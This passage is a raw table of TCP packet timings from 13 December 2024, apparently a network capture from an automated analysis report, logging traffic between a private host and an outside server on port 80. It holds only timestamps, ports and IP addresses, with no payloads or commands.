                          Dec 13, 2024 17:54:41.157747030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.157764912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.157788992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.160001993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.160063028 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.160142899 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.160351992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.162410975 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.162475109 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.162532091 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.162574053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.164836884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.164932966 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.164967060 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.165060043 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.167175055 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.167256117 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.167309999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.167355061 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.168724060 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.168796062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.168884039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.168930054 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.170350075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.170403957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.170428991 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.170485020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.171605110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.171669006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.171679974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.171705961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.175122976 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.175157070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.175201893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.175216913 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.175232887 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.175246954 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.175263882 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.175303936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.176870108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.176922083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.176996946 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.177043915 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.178189993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.178242922 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.178472042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.178510904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.180025101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.180083990 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.180160046 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.180196047 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.181770086 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.181818008 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.181910992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.181947947 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.183743000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.183784008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.183803082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.183820009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.184993029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.185010910 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.185040951 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.185056925 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.186510086 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.186558962 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.186573029 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.186589003 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.188178062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.188230038 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.188309908 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.188348055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.189905882 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.189969063 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.190045118 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.190079927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.191517115 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.191581011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.191833019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.191870928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.192861080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.192909002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.192997932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.193032980 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.194541931 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.194602966 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.194709063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.194747925 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.196245909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.196296930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.196387053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.196424961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.197751999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.197813034 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.197901964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.197941065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.199297905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.199348927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.199420929 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.199457884 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.200936079 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.201009989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.201092005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.201126099 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.202655077 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.202687025 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.202699900 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.203661919 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.204154015 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.204206944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.204292059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.204328060 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.205745935 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.205797911 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.205919981 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.205957890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.207469940 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.207504034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.207524061 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.207545042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.208725929 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.208791971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.208887100 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.208946943 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.302192926 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.302232027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.302387953 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.302798033 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.302850008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.302865982 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.302915096 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.304052114 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.304109097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.304169893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.304210901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.305316925 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.305391073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.305452108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.305489063 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.306596994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.306679010 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.306721926 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.306757927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.307889938 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.308001041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.308032036 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.308070898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.309114933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.309189081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.309282064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.309326887 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.310376883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.310440063 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.310549021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.310590982 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.311558008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.311606884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.311621904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.311661959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.312880993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.313004971 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.313014030 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.313055038 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.313991070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.314094067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.314225912 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.314299107 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.315157890 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.315213919 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.315216064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.315258980 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.316364050 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.316430092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.316452026 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.316498041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.317522049 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.317574978 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.317604065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.317615986 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.318640947 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.318701029 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.318777084 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.318839073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.319794893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.319855928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.320014000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.320060015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.320916891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.320952892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.320982933 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.320992947 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.322067976 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.322113037 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.322129011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.322154045 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.323200941 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.323257923 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.323266029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.323307037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.324273109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.324314117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.324346066 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.324359894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.325398922 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.325457096 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.325462103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.325527906 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.326739073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.326791048 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.326838970 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.326881886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.327554941 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.327650070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.327661037 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.327703953 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.328602076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.328654051 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.328843117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.328888893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.329830885 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.329907894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.329945087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.329986095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.330729008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.330781937 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.330811977 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.330851078 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.331984997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.332031965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.332110882 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.332154036 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.332932949 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.332978964 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.333022118 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.333076954 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.333854914 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.333899975 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.334027052 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.334064960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.334897041 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.334944010 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.335001945 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.335035086 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.335963964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.336010933 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.336061001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.336100101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.336983919 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.337030888 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.337071896 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.337112904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.338046074 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.338130951 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.338176966 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.338212967 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.339076996 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.339124918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.339195967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.339232922 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.340121031 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.340172052 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.340226889 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.340265036 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.341170073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.341218948 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.341326952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.341377020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.342266083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.342312098 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.342334032 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.342365026 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.343256950 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.343303919 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.343355894 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.343391895 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.344276905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.344325066 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.344400883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.344438076 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.345343113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.345396996 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.345495939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.345535040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.346416950 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.346477032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.346596956 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.346637011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.347436905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.347486019 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.347534895 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.347573042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.348464966 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.348531961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.348591089 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.348629951 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.349550962 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.349595070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.349663019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.349699974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.350524902 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.350575924 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.350640059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.350680113 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.351587057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.351634026 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.351700068 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.351789951 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.352638006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.352678061 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.352742910 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.352778912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.353681087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.353724957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.353818893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.353852987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.354717016 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.354760885 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.354799986 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.354834080 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.355784893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.355839014 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.355921030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.355958939 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.356791019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.356838942 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.356888056 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.356920958 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.357860088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.357920885 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.357985973 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.358025074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.358849049 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.358930111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.359014034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.359055996 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.359869003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.359913111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.494437933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.494481087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.494602919 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.494854927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.494915962 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.495040894 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.495088100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.495517969 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.495569944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.495615005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.495661020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.496571064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.496623993 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.496706009 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.496751070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.497553110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.497605085 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.497643948 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.497688055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.498542070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.498588085 CET4916180192.168.2.22190.90.160.170
